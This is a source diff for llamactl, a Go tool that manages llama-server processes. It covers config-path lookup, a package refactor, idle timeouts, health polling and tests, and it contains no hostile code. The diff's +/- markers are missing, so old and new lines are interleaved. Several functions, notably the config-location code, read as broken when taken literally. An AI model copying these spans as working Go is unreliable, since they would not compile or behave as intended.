if programData := os.Getenv("PROGRAMDATA"); programData != "" {
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
}
// Fallback to user home
if homeDir != "" {
} else if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
locations = append(locations, filepath.Join(os.Getenv("PROGRAMDATA"), "llamactl", "config.yaml"))
case "darwin":
// macOS: Use proper Application Support directories
// macOS: Use Application Support in user home, fallback to /Library/Application Support
if homeDir != "" {
locations = append(locations,
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
)
locations = append(locations, filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"))
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
default:
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" && homeDir != "" {
configHome = filepath.Join(homeDir, ".config")
// Linux/Unix: Use ~/.config/llamactl/config.yaml, fallback to /etc/llamactl/config.yaml
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, ".config", "llamactl", "config.yaml"))
}
if configHome != "" {
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
}
// System config: /etc/llamactl/config.yaml
locations = append(locations, "/etc/llamactl/config.yaml")
// Additional system locations
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
if dir != "" {
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
}
}
}
}
return locations
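
To see the new configuration fields end to end, here is a minimal sketch (assuming the pkg/config layout above; the YAML keys are exactly the ones declared in the struct tags) that writes a config file and loads it with config.LoadConfig:

package main

import (
	"fmt"
	"log"
	"os"
	"path/filepath"

	"llamactl/pkg/config"
)

func main() {
	// Hypothetical config exercising the keys added in this diff.
	yamlData := []byte(`
instances:
  data_dir: "/var/lib/llamactl"
  logs_dir: "/var/log/llamactl"
  auto_create_dirs: true
  default_on_demand_start: true
  on_demand_start_timeout: 120
  timeout_check_interval: 5
`)
	path := filepath.Join(os.TempDir(), "llamactl.yaml")
	if err := os.WriteFile(path, yamlData, 0o644); err != nil {
		log.Fatal(err)
	}
	defer os.Remove(path)

	cfg, err := config.LoadConfig(path)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(cfg.Instances.LogsDir, cfg.Instances.OnDemandStartTimeout)
}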

View File

@@ -1,16 +1,15 @@
package llamactl_test
package config_test
import (
"llamactl/pkg/config"
"os"
"path/filepath"
"testing"
llamactl "llamactl/pkg"
)
func TestLoadConfig_Defaults(t *testing.T) {
// Test loading config when no file exists and no env vars set
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig should not error with defaults: %v", err)
}
@@ -22,12 +21,24 @@ func TestLoadConfig_Defaults(t *testing.T) {
if cfg.Server.Port != 8080 {
t.Errorf("Expected default port to be 8080, got %d", cfg.Server.Port)
}
homedir, err := os.UserHomeDir()
if err != nil {
t.Fatalf("Failed to get user home directory: %v", err)
}
if cfg.Instances.InstancesDir != filepath.Join(homedir, ".local", "share", "llamactl", "instances") {
t.Errorf("Expected default instances directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "instances"), cfg.Instances.InstancesDir)
}
if cfg.Instances.LogsDir != filepath.Join(homedir, ".local", "share", "llamactl", "logs") {
t.Errorf("Expected default logs directory '%s', got %q", filepath.Join(homedir, ".local", "share", "llamactl", "logs"), cfg.Instances.LogsDir)
}
if !cfg.Instances.AutoCreateDirs {
t.Error("Expected default instances auto-create to be true")
}
if cfg.Instances.PortRange != [2]int{8000, 9000} {
t.Errorf("Expected default port range [8000, 9000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/tmp/llamactl" {
t.Errorf("Expected default log directory '/tmp/llamactl', got %q", cfg.Instances.LogDirectory)
}
if cfg.Instances.MaxInstances != -1 {
t.Errorf("Expected default max instances -1, got %d", cfg.Instances.MaxInstances)
}
@@ -56,7 +67,7 @@ server:
port: 9090
instances:
port_range: [7000, 8000]
log_directory: "/custom/logs"
logs_dir: "/custom/logs"
max_instances: 5
llama_executable: "/usr/bin/llama-server"
default_auto_restart: false
@@ -69,7 +80,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -84,8 +95,8 @@ instances:
if cfg.Instances.PortRange != [2]int{7000, 8000} {
t.Errorf("Expected port range [7000, 8000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/custom/logs" {
t.Errorf("Expected log directory '/custom/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/custom/logs" {
t.Errorf("Expected logs directory '/custom/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 5 {
t.Errorf("Expected max instances 5, got %d", cfg.Instances.MaxInstances)
@@ -110,7 +121,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
"LLAMACTL_HOST": "0.0.0.0",
"LLAMACTL_PORT": "3000",
"LLAMACTL_INSTANCE_PORT_RANGE": "5000-6000",
"LLAMACTL_LOG_DIR": "/env/logs",
"LLAMACTL_LOGS_DIR": "/env/logs",
"LLAMACTL_MAX_INSTANCES": "20",
"LLAMACTL_LLAMA_EXECUTABLE": "/env/llama-server",
"LLAMACTL_DEFAULT_AUTO_RESTART": "false",
@@ -124,7 +135,7 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
defer os.Unsetenv(key)
}
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
if cfg.Instances.PortRange != [2]int{5000, 6000} {
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
}
if cfg.Instances.LogDirectory != "/env/logs" {
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
if cfg.Instances.LogsDir != "/env/logs" {
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
}
if cfg.Instances.MaxInstances != 20 {
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
@@ -183,7 +194,7 @@ instances:
defer os.Unsetenv("LLAMACTL_HOST")
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -219,7 +230,7 @@ instances:
t.Fatalf("Failed to write test config file: %v", err)
}
_, err = llamactl.LoadConfig(configFile)
_, err = config.LoadConfig(configFile)
if err == nil {
t.Error("Expected LoadConfig to return error for invalid YAML")
}
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
result := llamactl.ParsePortRange(tt.input)
result := config.ParsePortRange(tt.input)
if result != tt.expected {
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
}
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
testCases := []struct {
envVar string
envValue string
checkFn func(*llamactl.Config) bool
checkFn func(*config.AppConfig) bool
desc string
}{
{
envVar: "LLAMACTL_PORT",
envValue: "invalid-port",
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
desc: "invalid port number should keep default",
},
{
envVar: "LLAMACTL_MAX_INSTANCES",
envValue: "not-a-number",
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
desc: "invalid max instances should keep default",
},
{
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
envValue: "invalid-bool",
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
desc: "invalid boolean should keep default",
},
{
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
envValue: "invalid-range",
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
desc: "invalid port range should keep default",
},
}
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
os.Setenv(tc.envVar, tc.envValue)
defer os.Unsetenv(tc.envVar)
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
cfg, err := config.LoadConfig("nonexistent-file.yaml")
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}
@@ -323,7 +334,7 @@ server:
t.Fatalf("Failed to write test config file: %v", err)
}
cfg, err := llamactl.LoadConfig(configFile)
cfg, err := config.LoadConfig(configFile)
if err != nil {
t.Fatalf("LoadConfig failed: %v", err)
}

View File

@@ -1,27 +1,45 @@
package llamactl
package instance
import (
"context"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"log"
"net/http"
"net/http/httputil"
"net/url"
"os/exec"
"sync"
"sync/atomic"
"time"
)
// TimeProvider interface allows for testing with mock time
type TimeProvider interface {
Now() time.Time
}
// realTimeProvider implements TimeProvider using the actual time
type realTimeProvider struct{}
func (realTimeProvider) Now() time.Time {
return time.Now()
}
type CreateInstanceOptions struct {
// Auto restart
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
// RestartDelay duration in seconds
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
LlamaServerOptions `json:",inline"`
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
// On demand start
OnDemandStart *bool `json:"on_demand_start,omitempty"`
// Idle timeout
IdleTimeout *int `json:"idle_timeout,omitempty"`
// LlamaServerOptions contains the options for the llama server
llamacpp.LlamaServerOptions `json:",inline"`
}
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
@@ -30,9 +48,11 @@ type CreateInstanceOptions struct {
func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
// First, unmarshal into a temporary struct without the embedded type
type tempCreateOptions struct {
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
AutoRestart *bool `json:"auto_restart,omitempty"`
MaxRestarts *int `json:"max_restarts,omitempty"`
RestartDelay *int `json:"restart_delay,omitempty"`
OnDemandStart *bool `json:"on_demand_start,omitempty"`
IdleTimeout *int `json:"idle_timeout,omitempty"`
}
var temp tempCreateOptions
@@ -44,6 +64,8 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
c.AutoRestart = temp.AutoRestart
c.MaxRestarts = temp.MaxRestarts
c.RestartDelay = temp.RestartDelay
c.OnDemandStart = temp.OnDemandStart
c.IdleTimeout = temp.IdleTimeout
// Now unmarshal the embedded LlamaServerOptions
if err := json.Unmarshal(data, &c.LlamaServerOptions); err != nil {
@@ -53,11 +75,11 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
return nil
}
// Instance represents a running instance of the llama server
type Instance struct {
// Process represents a running instance of the llama server
type Process struct {
Name string `json:"name"`
options *CreateInstanceOptions `json:"-"`
globalSettings *InstancesConfig
globalSettings *config.InstancesConfig
// Status
Running bool `json:"running"`
@@ -81,6 +103,10 @@ type Instance struct {
// Restart control
restartCancel context.CancelFunc `json:"-"` // Cancel function for pending restarts
monitorDone chan struct{} `json:"-"` // Channel to signal monitor goroutine completion
// Timeout management
lastRequestTime atomic.Int64 // Unix timestamp of last request
timeProvider TimeProvider `json:"-"` // Time provider for testing
}
// validateAndCopyOptions validates and creates a deep copy of the provided options
@@ -115,13 +141,27 @@ func validateAndCopyOptions(name string, options *CreateInstanceOptions) *Create
}
optionsCopy.RestartDelay = &restartDelay
}
if options.OnDemandStart != nil {
onDemandStart := *options.OnDemandStart
optionsCopy.OnDemandStart = &onDemandStart
}
if options.IdleTimeout != nil {
idleTimeout := *options.IdleTimeout
if idleTimeout < 0 {
log.Printf("Instance %s IdleTimeout value (%d) cannot be negative, setting to 0 minutes", name, idleTimeout)
idleTimeout = 0
}
optionsCopy.IdleTimeout = &idleTimeout
}
}
return optionsCopy
}
// applyDefaultOptions applies default values from global settings to any nil options
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
if globalSettings == nil {
return
}
@@ -140,36 +180,44 @@ func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *Instanc
defaultRestartDelay := globalSettings.DefaultRestartDelay
options.RestartDelay = &defaultRestartDelay
}
if options.OnDemandStart == nil {
defaultOnDemandStart := globalSettings.DefaultOnDemandStart
options.OnDemandStart = &defaultOnDemandStart
}
if options.IdleTimeout == nil {
defaultIdleTimeout := 0
options.IdleTimeout = &defaultIdleTimeout
}
}
// NewInstance creates a new instance with the given name, log path, and options
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
// Validate and copy options
optionsCopy := validateAndCopyOptions(name, options)
// Apply defaults
applyDefaultOptions(optionsCopy, globalSettings)
// Create the instance logger
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
logger := NewInstanceLogger(name, globalSettings.LogsDir)
return &Instance{
return &Process{
Name: name,
options: optionsCopy,
globalSettings: globalSettings,
logger: logger,
Running: false,
Created: time.Now().Unix(),
timeProvider: realTimeProvider{},
Created: time.Now().Unix(),
}
}
func (i *Instance) GetOptions() *CreateInstanceOptions {
func (i *Process) GetOptions() *CreateInstanceOptions {
i.mu.RLock()
defer i.mu.RUnlock()
return i.options
}
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
func (i *Process) SetOptions(options *CreateInstanceOptions) {
i.mu.Lock()
defer i.mu.Unlock()
@@ -187,8 +235,13 @@ func (i *Instance) SetOptions(options *CreateInstanceOptions) {
i.proxy = nil
}
// SetTimeProvider sets a custom time provider for testing
func (i *Process) SetTimeProvider(tp TimeProvider) {
i.timeProvider = tp
}
// GetProxy returns the reverse proxy for this instance, creating it if needed
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
i.mu.Lock()
defer i.mu.Unlock()
@@ -225,7 +278,7 @@ func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
}
// MarshalJSON implements json.Marshaler for Instance
func (i *Instance) MarshalJSON() ([]byte, error) {
func (i *Process) MarshalJSON() ([]byte, error) {
// Use read lock since we're only reading data
i.mu.RLock()
defer i.mu.RUnlock()
@@ -235,22 +288,25 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{
Name: i.Name,
Options: i.options,
Running: i.Running,
Created: i.Created,
}
return json.Marshal(temp)
}
// UnmarshalJSON implements json.Unmarshaler for Instance
func (i *Instance) UnmarshalJSON(data []byte) error {
func (i *Process) UnmarshalJSON(data []byte) error {
// Create a temporary struct for unmarshalling
temp := struct {
Name string `json:"name"`
Options *CreateInstanceOptions `json:"options,omitempty"`
Running bool `json:"running"`
Created int64 `json:"created,omitempty"`
}{}
if err := json.Unmarshal(data, &temp); err != nil {
@@ -260,6 +316,7 @@ func (i *Instance) UnmarshalJSON(data []byte) error {
// Set the fields
i.Name = temp.Name
i.Running = temp.Running
i.Created = temp.Created
// Handle options with validation but no defaults
if temp.Options != nil {
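
A hedged round-trip example for the renamed and added option fields (restart_delay, on_demand_start, idle_timeout), exercising the custom unmarshaler above; illustrative only:

package main

import (
	"encoding/json"
	"fmt"
	"log"

	"llamactl/pkg/instance"
)

func main() {
	// restart_delay (renamed from restart_delay_seconds), on_demand_start
	// and idle_timeout are the fields added or renamed in this diff.
	data := []byte(`{
		"model": "/path/to/model.gguf",
		"port": 8080,
		"restart_delay": 10,
		"on_demand_start": true,
		"idle_timeout": 15
	}`)

	var opts instance.CreateInstanceOptions
	if err := json.Unmarshal(data, &opts); err != nil {
		log.Fatal(err)
	}
	fmt.Println(opts.Model, *opts.OnDemandStart, *opts.IdleTimeout) // /path/to/model.gguf true 15
}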

View File

@@ -0,0 +1,322 @@
package instance_test
import (
"encoding/json"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/testutil"
"testing"
)
func TestNewInstance(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
if instance.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
// Check that options were properly set with defaults applied
opts := instance.GetOptions()
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
// Check that defaults were applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 3 {
t.Errorf("Expected MaxRestarts to be 3 (default), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 5 {
t.Errorf("Expected RestartDelay to be 5 (default), got %v", opts.RestartDelay)
}
}
func TestNewInstance_WithRestartOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
// Override some defaults
autoRestart := false
maxRestarts := 10
restartDelay := 15
options := &instance.CreateInstanceOptions{
AutoRestart: &autoRestart,
MaxRestarts: &maxRestarts,
RestartDelay: &restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
opts := instance.GetOptions()
// Check that explicit values override defaults
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false (overridden)")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 10 {
t.Errorf("Expected MaxRestarts to be 10 (overridden), got %v", opts.MaxRestarts)
}
if opts.RestartDelay == nil || *opts.RestartDelay != 15 {
t.Errorf("Expected RestartDelay to be 15 (overridden), got %v", opts.RestartDelay)
}
}
func TestSetOptions(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
initialOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
// Update options
newOptions := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
inst.SetOptions(newOptions)
opts := inst.GetOptions()
if opts.Model != "/path/to/new-model.gguf" {
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
}
if opts.Port != 8081 {
t.Errorf("Expected updated port 8081, got %d", opts.Port)
}
// Check that defaults are still applied
if opts.AutoRestart == nil || !*opts.AutoRestart {
t.Error("Expected AutoRestart to be true (default)")
}
}
func TestGetProxy(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Host: "localhost",
Port: 8080,
},
}
inst := instance.NewInstance("test-instance", globalSettings, options)
// Get proxy for the first time
proxy1, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 == nil {
t.Error("Expected proxy to be created")
}
// Get proxy again - should return cached version
proxy2, err := inst.GetProxy()
if err != nil {
t.Fatalf("GetProxy failed: %v", err)
}
if proxy1 != proxy2 {
t.Error("Expected cached proxy to be returned")
}
}
func TestMarshalJSON(t *testing.T) {
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
options := &instance.CreateInstanceOptions{
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance := instance.NewInstance("test-instance", globalSettings, options)
data, err := json.Marshal(instance)
if err != nil {
t.Fatalf("JSON marshal failed: %v", err)
}
// Check that JSON contains expected fields
var result map[string]interface{}
err = json.Unmarshal(data, &result)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if result["name"] != "test-instance" {
t.Errorf("Expected name 'test-instance', got %v", result["name"])
}
if result["running"] != false {
t.Errorf("Expected running false, got %v", result["running"])
}
// Check that options are included
options_data, ok := result["options"]
if !ok {
t.Error("Expected options to be included in JSON")
}
options_map, ok := options_data.(map[string]interface{})
if !ok {
t.Error("Expected options to be a map")
}
if options_map["model"] != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %v", options_map["model"])
}
}
func TestUnmarshalJSON(t *testing.T) {
jsonData := `{
"name": "test-instance",
"running": true,
"options": {
"model": "/path/to/model.gguf",
"port": 8080,
"auto_restart": false,
"max_restarts": 5
}
}`
var inst instance.Process
err := json.Unmarshal([]byte(jsonData), &inst)
if err != nil {
t.Fatalf("JSON unmarshal failed: %v", err)
}
if inst.Name != "test-instance" {
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
}
if !inst.Running {
t.Error("Expected running to be true")
}
opts := inst.GetOptions()
if opts == nil {
t.Fatal("Expected options to be set")
}
if opts.Model != "/path/to/model.gguf" {
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
}
if opts.Port != 8080 {
t.Errorf("Expected port 8080, got %d", opts.Port)
}
if opts.AutoRestart == nil || *opts.AutoRestart {
t.Error("Expected AutoRestart to be false")
}
if opts.MaxRestarts == nil || *opts.MaxRestarts != 5 {
t.Errorf("Expected MaxRestarts to be 5, got %v", opts.MaxRestarts)
}
}
func TestCreateInstanceOptionsValidation(t *testing.T) {
tests := []struct {
name string
maxRestarts *int
restartDelay *int
expectedMax int
expectedDelay int
}{
{
name: "valid positive values",
maxRestarts: testutil.IntPtr(10),
restartDelay: testutil.IntPtr(30),
expectedMax: 10,
expectedDelay: 30,
},
{
name: "zero values",
maxRestarts: testutil.IntPtr(0),
restartDelay: testutil.IntPtr(0),
expectedMax: 0,
expectedDelay: 0,
},
{
name: "negative values should be corrected",
maxRestarts: testutil.IntPtr(-5),
restartDelay: testutil.IntPtr(-10),
expectedMax: 0,
expectedDelay: 0,
},
}
globalSettings := &config.InstancesConfig{
LogsDir: "/tmp/test",
}
for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) {
options := &instance.CreateInstanceOptions{
MaxRestarts: tt.maxRestarts,
RestartDelay: tt.restartDelay,
LlamaServerOptions: llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance := instance.NewInstance("test", globalSettings, options)
opts := instance.GetOptions()
if opts.MaxRestarts == nil {
t.Error("Expected MaxRestarts to be set")
} else if *opts.MaxRestarts != tt.expectedMax {
t.Errorf("Expected MaxRestarts %d, got %d", tt.expectedMax, *opts.MaxRestarts)
}
if opts.RestartDelay == nil {
t.Error("Expected RestartDelay to be set")
} else if *opts.RestartDelay != tt.expectedDelay {
t.Errorf("Expected RestartDelay %d, got %d", tt.expectedDelay, *opts.RestartDelay)
}
})
}
}

View File

@@ -1,9 +1,10 @@
package llamactl
package instance
import (
"context"
"fmt"
"log"
"net/http"
"os/exec"
"runtime"
"syscall"
@@ -11,7 +12,7 @@ import (
)
// Start starts the llama server instance and returns an error if it fails.
func (i *Instance) Start() error {
func (i *Process) Start() error {
i.mu.Lock()
defer i.mu.Unlock()
@@ -30,6 +31,9 @@ func (i *Instance) Start() error {
i.restarts = 0
}
// Initialize last request time to current time when starting
i.lastRequestTime.Store(i.timeProvider.Now().Unix())
// Create log files
if err := i.logger.Create(); err != nil {
return fmt.Errorf("failed to create log files: %w", err)
@@ -75,7 +79,7 @@ func (i *Instance) Start() error {
}
// Stop terminates the subprocess
func (i *Instance) Stop() error {
func (i *Process) Stop() error {
i.mu.Lock()
if !i.Running {
@@ -140,7 +144,75 @@ func (i *Instance) Stop() error {
return nil
}
func (i *Instance) monitorProcess() {
func (i *Process) WaitForHealthy(timeout int) error {
if !i.Running {
return fmt.Errorf("instance %s is not running", i.Name)
}
if timeout <= 0 {
timeout = 30 // Default to 30 seconds if no timeout is specified
}
ctx, cancel := context.WithTimeout(context.Background(), time.Duration(timeout)*time.Second)
defer cancel()
// Get instance options to build the health check URL
opts := i.GetOptions()
if opts == nil {
return fmt.Errorf("instance %s has no options set", i.Name)
}
// Build the health check URL directly
host := opts.Host
if host == "" {
host = "localhost"
}
healthURL := fmt.Sprintf("http://%s:%d/health", host, opts.Port)
// Create a dedicated HTTP client for health checks
client := &http.Client{
Timeout: 5 * time.Second, // 5 second timeout per request
}
// Helper function to check health directly
checkHealth := func() bool {
req, err := http.NewRequestWithContext(ctx, "GET", healthURL, nil)
if err != nil {
return false
}
resp, err := client.Do(req)
if err != nil {
return false
}
defer resp.Body.Close()
return resp.StatusCode == http.StatusOK
}
// Try immediate check first
if checkHealth() {
return nil // Instance is healthy
}
// If immediate check failed, start polling
ticker := time.NewTicker(1 * time.Second)
defer ticker.Stop()
for {
select {
case <-ctx.Done():
return fmt.Errorf("timeout waiting for instance %s to become healthy after %d seconds", i.Name, timeout)
case <-ticker.C:
if checkHealth() {
return nil // Instance is healthy
}
// Continue polling
}
}
}
func (i *Process) monitorProcess() {
defer func() {
i.mu.Lock()
if i.monitorDone != nil {
@@ -181,7 +253,7 @@ func (i *Instance) monitorProcess() {
}
// handleRestart manages the restart process while holding the lock
func (i *Instance) handleRestart() {
func (i *Process) handleRestart() {
// Validate restart conditions and get safe parameters
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
if !shouldRestart {
@@ -223,7 +295,7 @@ func (i *Instance) handleRestart() {
}
// validateRestartConditions checks if the instance should be restarted and returns the parameters
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
if i.options == nil {
log.Printf("Instance %s not restarting: options are nil", i.Name)
return false, 0, 0
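
The commit log ties WaitForHealthy to on-demand start in OpenAIProxy; that wiring is outside this diff, but a plausible sketch of the request path looks like this (ensureRunning is a hypothetical helper, not part of the change):

// Sketch only: combine Start with WaitForHealthy for on-demand start.
func ensureRunning(i *Process, timeoutSeconds int) error {
	if i.Running {
		return nil // already serving traffic
	}
	if err := i.Start(); err != nil {
		return fmt.Errorf("on-demand start of %s failed: %w", i.Name, err)
	}
	// Poll the instance's /health endpoint until it returns 200 OK
	// or the configured OnDemandStartTimeout elapses.
	return i.WaitForHealthy(timeoutSeconds)
}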

View File

@@ -1,4 +1,4 @@
package llamactl
package instance
import (
"bufio"
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
}
// GetLogs retrieves the last n lines of logs from the instance
func (i *Instance) GetLogs(num_lines int) (string, error) {
func (i *Process) GetLogs(num_lines int) (string, error) {
i.mu.RLock()
logFileName := i.logger.logFilePath
i.mu.RUnlock()

View File

@@ -1,6 +1,6 @@
//go:build !windows
package llamactl
package instance
import (
"os/exec"

View File

@@ -1,6 +1,6 @@
//go:build windows
package llamactl
package instance
import "os/exec"

pkg/instance/timeout.go (new file, +28 lines)
View File

@@ -0,0 +1,28 @@
package instance
// UpdateLastRequestTime updates the last request access time for the instance via proxy
// (Called from the request proxy on each forwarded request.)
func (i *Process) UpdateLastRequestTime() {
i.mu.Lock()
defer i.mu.Unlock()
lastRequestTime := i.timeProvider.Now().Unix()
i.lastRequestTime.Store(lastRequestTime)
}
func (i *Process) ShouldTimeout() bool {
i.mu.RLock()
defer i.mu.RUnlock()
if !i.Running || i.options.IdleTimeout == nil || *i.options.IdleTimeout <= 0 {
return false
}
// Check if the last request time exceeds the idle timeout
lastRequest := i.lastRequestTime.Load()
idleTimeoutMinutes := *i.options.IdleTimeout
// Convert timeout from minutes to seconds for comparison
idleTimeoutSeconds := int64(idleTimeoutMinutes * 60)
return (i.timeProvider.Now().Unix() - lastRequest) > idleTimeoutSeconds
}
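
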